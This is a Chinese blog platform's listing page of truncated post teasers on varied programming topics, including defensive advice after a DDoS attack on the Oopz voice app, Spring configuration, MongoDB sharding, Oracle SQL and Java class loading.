  • 对游戏语音软件Oopz遭遇DDoS攻击后的一些建议 网络安全服务 ddos服务器udp负载均衡安全tcp/ipweb安全
    由于武汉天气太热,因此周末两天就没怎么出门。一直在家打《黑神话:悟空》,结果卡在广智这里一直打不过去,本来想找好友一起讨论下该怎么过,但又没有好的游戏语音软件。于是在网上搜索了一些信息,并偶然间发现了一个名为Oopz的游戏语音软件遭受DDoS攻击的消息。值得注意的是,自最近三个月以来,Oopz共发生两起DDoS攻击事件。身为一名网络安全从业者,对6月份的这一次DDoS攻击事件提出以下建议,宝子们可
  • 推动国密SSL发展的建议与策略 bilicute ssl网络协议网络
    摘要:国密SSL作为我国网络安全的重要组成部分,其发展对于保障国家信息安全具有重要意义。本文针对国密SSL当前发展现状,提出了几点发展建议,旨在推动国密SSL技术的广泛应用和市场竞争力。一、引言国密SSL(SecureSocketsLayer)是指采用国家商用密码算法的SSL证书,它在我国网络安全体系中扮演着至关重要的角色。随着网络信息化的快速发展,国密SSL的应用前景日益广阔。然而,面对国际SS
  • Spring中@Value注解,需要注意的地方 无量 springbean@Valuexml
    Spring 3以后,支持@Value注解的方式获取properties文件中的配置值,简化了读取配置文件的复杂操作 1、在applicationContext.xml文件(或引用文件中)中配置properties文件 <bean id="appProperty" class="org.springframework.beans.fac
  • mongoDB 分片 开窍的石头 mongodb
        mongoDB的分片。要mongos查询数据时候 先查询configsvr看数据在那台shard上,configsvr上边放的是metar信息,指的是那条数据在那个片上。由此可以看出mongo在做分片的时候咱们至少要有一个configsvr,和两个以上的shard(片)信息。     第一步启动两台以上的mongo服务 &nb
  • OVER(PARTITION BY)函数用法 0624chenhong oracle
    这篇写得很好,引自 http://www.cnblogs.com/lanzi/archive/2010/10/26/1861338.html OVER(PARTITION BY)函数用法 2010年10月26日 OVER(PARTITION BY)函数介绍 开窗函数        &nb
  • Android开发中,ADB server didn't ACK 解决方法 一炮送你回车库 Android开发
    首先通知:凡是安装360、豌豆荚、腾讯管家的全部卸载,然后再尝试。   一直没搞明白这个问题咋出现的,但今天看到一个方法,搞定了!原来是豌豆荚占用了 5037 端口导致。 参见原文章:一个豌豆荚引发的血案——关于ADB server didn't ACK的问题 简单来讲,首先将Windows任务进程中的豌豆荚干掉,如果还是不行,再继续按下列步骤排查。 &nb
  • canvas中的像素绘制问题 换个号韩国红果果 JavaScriptcanvas
    pixl的绘制,1.如果绘制点正处于相邻像素交叉线,绘制x像素的线宽,则从交叉线分别向前向后绘制x/2个像素,如果x/2是整数,则刚好填满x个像素,如果是小数,则先把整数格填满,再去绘制剩下的小数部分,绘制时,是将小数部分的颜色用来除以一个像素的宽度,颜色会变淡。所以要用整数坐标来画的话(即绘制点正处于相邻像素交叉线时),线宽必须是2的整数倍。否则会出现不饱满的像素。 2.如果绘制点为一个像素的
  • 编码乱码问题 灵静志远 javajvmjsp编码
    1、JVM中单个字符占用的字节长度跟编码方式有关,而默认编码方式又跟平台是一一对应的或说平台决定了默认字符编码方式;2、对于单个字符:ISO-8859-1单字节编码,GBK双字节编码,UTF-8三字节编码;因此中文平台(中文平台默认字符集编码GBK)下一个中文字符占2个字节,而英文平台(英文平台默认字符集编码Cp1252(类似于ISO-8859-1))。 3、getBytes()、getByte
  • java 求几个月后的日期 darkranger calendargetinstance
    Date plandate = planDate.toDate(); SimpleDateFormat df = new SimpleDateFormat("yyyy-MM-dd"); Calendar cal = Calendar.getInstance(); cal.setTime(plandate); // 取得三个月后时间 cal.add(Calendar.M
  • 数据库设计的三大范式(通俗易懂) aijuans 数据库复习
    关系数据库中的关系必须满足一定的要求。满足不同程度要求的为不同范式。数据库的设计范式是数据库设计所需要满足的规范。只有理解数据库的设计范式,才能设计出高效率、优雅的数据库,否则可能会设计出错误的数据库. 目前,主要有六种范式:第一范式、第二范式、第三范式、BC范式、第四范式和第五范式。满足最低要求的叫第一范式,简称1NF。在第一范式基础上进一步满足一些要求的为第二范式,简称2NF。其余依此类推。
  • 想学工作流怎么入手 atongyeye jbpm
    工作流在工作中变得越来越重要,很多朋友想学工作流却不知如何入手。 很多朋友习惯性的这看一点,那了解一点,既不系统,也容易半途而废。好比学武功,最好的办法是有一本武功秘籍。研究明白,则犹如打通任督二脉。 系统学习工作流,很重要的一本书《JBPM工作流开发指南》。 本人苦苦学习两个月,基本上可以解决大部分流程问题。整理一下学习思路,有兴趣的朋友可以参考下。 1  首先要
  • Context和SQLiteOpenHelper创建数据库 百合不是茶 androidContext创建数据库
           一直以为安卓数据库的创建就是使用SQLiteOpenHelper创建,但是最近在android的一本书上看到了Context也可以创建数据库,下面我们一起分析这两种方式创建数据库的方式和区别,重点在SQLiteOpenHelper     一:SQLiteOpenHelper创建数据库:   1,SQLi
  • 浅谈group by和distinct bijian1013 oracle数据库group bydistinct
            group by和distinct只了去重意义一样,但是group by应用范围更广泛些,如分组汇总或者从聚合函数里筛选数据等。         譬如:统计每id数并且只显示数大于3 select id ,count(id) from ta
  • vi opertion 征客丶 macoprationvi
    进入 command mode (命令行模式) 按 esc 键 再按 shift + 冒号 注:以下命令中 带 $ 【在命令行模式下进行】,不带 $ 【在非命令行模式下进行】 一、文件操作 1.1、强制退出不保存 $ q! 1.2、保存 $ w 1.3、保存并退出 $ wq 1.4、刷新或重新加载已打开的文件 $ e 二、光标移动 2.1、跳到指定行 数字
  • 【Spark十四】深入Spark RDD第三部分RDD基本API bit1129 spark
      对于K/V类型的RDD,如下操作是什么含义?   val rdd = sc.parallelize(List(("A",3),("C",6),("A",1),("B",5)) rdd.reduceByKey(_+_).collect  reduceByKey在这里的操作,是把
  • java类加载机制 BlueSkator java虚拟机
    java类加载机制 1.java类加载器的树状结构 引导类加载器 ^ | 扩展类加载器 ^ | 系统类加载器 java使用代理模式来完成类加载,java的类加载器也有类似于继承的关系,引导类是最顶层的加载器,它是所有类的根加载器,它负责加载java核心库。当一个类加载器接到装载类到虚拟机的请求时,通常会代理给父类加载器,若已经是根加载器了,就自己完成加载。 虚拟机区分一个Cla
  • 动态添加文本框 BreakingBad 文本框
      <script>     var num=1; function AddInput() {      var str="";     str+="<input 
  • 读《研磨设计模式》-代码笔记-单例模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ public class Singleton { } /* * 懒汉模式。注意,getInstance如果在多线程环境中调用,需要加上synchronized,否则存在线程不安全问题 */ class LazySingleton
  • iOS应用打包发布常见问题 chenhbc iosiOS发布iOS上传iOS打包
    这个月公司安排我一个人做iOS客户端开发,由于急着用,我先发布一个版本,由于第一次发布iOS应用,期间出了不少问题,记录于此。   1、使用Application Loader 发布时报错:Communication error.please use diagnostic mode to check connectivity.you need to have outbound acc
  • 工作流复杂拓扑结构处理新思路 comsci 设计模式工作算法企业应用OO
    我们走的设计路线和国外的产品不太一样,不一样在哪里呢?  国外的流程的设计思路是通过事先定义一整套规则(类似XPDL)来约束和控制流程图的复杂度(我对国外的产品了解不够多,仅仅是在有限的了解程度上面提出这样的看法),从而避免在流程引擎中处理这些复杂的图的问题,而我们却没有通过事先定义这样的复杂的规则来约束和降低用户自定义流程图的灵活性,这样一来,在引擎和流程流转控制这一个层面就会遇到很
  • oracle 11g新特性Flashback data archive daizj oracle
    1. 什么是flashback data archive Flashback data archive是oracle 11g中引入的一个新特性。Flashback archive是一个新的数据库对象,用于存储一个或多表的历史数据。Flashback archive是一个逻辑对象,概念上类似于表空间。实际上flashback archive可以看作是存储一个或多个表的所有事务变化的逻辑空间。
  • 多叉树:2-3-4树 dieslrae
        平衡树多叉树,每个节点最多有4个子节点和3个数据项,2,3,4的含义是指一个节点可能含有的子节点的个数,效率比红黑树稍差.一般不允许出现重复关键字值.2-3-4树有以下特征:     1、有一个数据项的节点总是有2个子节点(称为2-节点)     2、有两个数据项的节点总是有3个子节点(称为3-节
  • C语言学习七动态分配 malloc的使用 dcj3sjt126com clanguagemalloc
    /* 2013年3月15日15:16:24 malloc 就memory(内存) allocate(分配)的缩写 本程序没有实际含义,只是理解使用 */ # include <stdio.h> # include <malloc.h> int main(void) { int i = 5; //分配了4个字节 静态分配 int * p
  • Objective-C编码规范[译] dcj3sjt126com 代码规范
      原文链接 : The official raywenderlich.com Objective-C style guide 原文作者 : raywenderlich.com Team 译文出自 : raywenderlich.com Objective-C编码规范 译者 : Sam Lau
  • 0.性能优化-目录 frank1234 性能优化
    从今天开始笔者陆续发表一些性能测试相关的文章,主要是对自己前段时间学习的总结,由于水平有限,性能测试领域很深,本人理解的也比较浅,欢迎各位大咖批评指正。 主要内容包括: 一、性能测试指标 吞吐量、TPS、响应时间、负载、可扩展性、PV、思考时间 http://frank1234.iteye.com/blog/2180305 二、性能测试策略 生产环境相同 基准测试 预热等 htt
  • Java父类取得子类传递的泛型参数Class类型 happyqing java泛型父类子类Class
      import java.lang.reflect.ParameterizedType; import java.lang.reflect.Type; import org.junit.Test; abstract class BaseDao<T> { public void getType() { //Class<E> clazz =
  • 跟我学SpringMVC目录汇总贴、PDF下载、源码下载 jinnianshilongnian springMVC
      ----广告-------------------------------------------------------------- 网站核心商详页开发 掌握Java技术,掌握并发/异步工具使用,熟悉spring、ibatis框架; 掌握数据库技术,表设计和索引优化,分库分表/读写分离; 了解缓存技术,熟练使用如Redis/Memcached等主流技术; 了解Ngin
  • the HTTP rewrite module requires the PCRE library 流浪鱼 rewrite
    ./configure: error: the HTTP rewrite module requires the PCRE library. 模块依赖性Nginx需要依赖下面3个包 1. gzip 模块需要 zlib 库 ( 下载: http://www.zlib.net/ ) 2. rewrite 模块需要 pcre 库 ( 下载: http://www.pcre.org/ ) 3. s
  • 第12章 Ajax(中) onestopweb Ajax
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • Optimize query with Query Stripping in Web Intelligence blueoxygen BO
    http://wiki.sdn.sap.com/wiki/display/BOBJ/Optimize+query+with+Query+Stripping+in+Web+Intelligence and a very straightfoward video http://www.sdn.sap.com/irj/scn/events?rid=/library/uuid/40ec3a0c-936
  • Java开发者写SQL时常犯的10个错误 tomcat_oracle javasql
    1、不用PreparedStatements   有意思的是,在JDBC出现了许多年后的今天,这个错误依然出现在博客、论坛和邮件列表中,即便要记住和理解它是一件很简单的事。开发者不使用PreparedStatements的原因可能有如下几个:   他们对PreparedStatements不了解   他们认为使用PreparedStatements太慢了   他们认为写Prepar
  • 世纪互联与结盟有感 阿尔萨斯
    10月10日,世纪互联与(Foxcon)签约成立合资公司,有感。 全球电子制造业巨头(全球500强企业)与世纪互联共同看好IDC、云计算等业务在中国的增长空间,双方迅速果断出手,在资本层面上达成合作,此举体现了全球电子制造业巨头对世纪互联IDC业务的欣赏与信任,另一方面反映出世纪互联目前良好的运营状况与广阔的发展前景。 众所周知,精于电子产品制造(世界第一),对于世纪互联而言,能够与结盟
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他